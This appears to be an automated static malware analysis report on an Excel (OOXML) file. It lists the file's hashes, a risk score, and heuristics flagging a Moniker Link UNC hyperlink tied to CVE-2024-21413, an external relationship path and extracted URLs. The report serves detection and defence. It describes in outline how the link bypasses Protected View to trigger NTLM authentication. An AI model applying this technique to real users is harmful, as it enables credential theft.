Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 91e2439fa1ef2687…

MALICIOUS

Office (OOXML) / .XLSX

487.8 KB Created: 2018-12-18 10:38:50 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2024-07-31
MD5: ee2ee20077808e4a43042d42661bc67d SHA-1: 717a01b3e0a45132fcb4ecc3fc226139479183a5 SHA-256: 91e2439fa1ef2687833c9aa9eeb6dc26adef962eabad9742e69150036a219ac8
82 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1566.002 Spearphishing Attachment

The critical heuristic firing for CVE-2024-21413 indicates the document is designed to exploit this vulnerability via a Moniker Link UNC path. The embedded UNC path points to a potentially malicious Excel file, suggesting a downloader or dropper functionality. The presence of external relationships and embedded URLs further supports the likelihood of payload delivery.

Heuristics 3

  • CVE-2024-21413 — Moniker Link UNC path in OOXML critical CVE likely CVE_2024_21413
    Document contains a file:///\\...! hyperlink matching the Moniker Link shape associated with CVE-2024-21413. In affected Office/Outlook paths this can bypass Protected View and trigger NTLM authentication.
  • External relationship medium OOXML_EXTERNAL_REL
    External target in xl/externalLinks/_rels/externalLink1.xml.rels: /PRZETARGI/OBwodnica Nowa Sól2/Documents and Settings/Jarek/Ustawienia lokalne/Temporary Internet Files/Content.IE5/MTJW
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://stranet.strabag.com/Moje
    • http://notespol06/WINDOWS/TEMP/Apo.xls
    • https://budimex-my.sharepoint.com/ARCHIVIO
    • https://budimex-my.sharepoint.com/Tematy_2012/KCO/notesCDEF00/notesCDEF00/Documents

Open this report in the interactive analyzer, or submit your own file for analysis.